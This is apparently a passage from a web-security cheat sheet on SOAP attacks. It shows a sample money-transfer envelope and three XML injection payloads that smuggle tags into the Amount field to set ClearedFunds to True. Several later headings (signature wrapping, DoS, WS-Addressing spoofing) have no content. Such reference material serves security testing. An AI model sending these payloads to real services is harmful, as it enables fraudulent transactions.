Link to this headingSOAP

Example SOAP:

<soap:Envelope xmlns:soap=”http://www.w3.org/2001/12/soap-envelope”> <soap:Body> <pre:Add xmlns:pre=http://target/lists soap:encodingStyle= “http://www.w3.org/2001/12/soap-encoding”> <Account> <FromAccount>18281008</FromAccount> <Amount>1430</Amount> <ClearedFunds>False</ClearedFunds> <ToAccount>08447656</ToAccount> </Account> </pre:Add> </soap:Body> </soap:Envelope>

Example Injections:

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430&ToAccount=08447656&Submit=Submit FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount><!--&ToAccount=-->08447656&Submit=Submit FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount>08447656</ToAccount></Account></pre:Add></soap:Body></soap:Envelope><!--&Submit=Submit

Link to this headingSignature Wrapping

Link to this headingDoS

Link to this headingRedirect Reference

Link to this headingWS-Addressing spoofing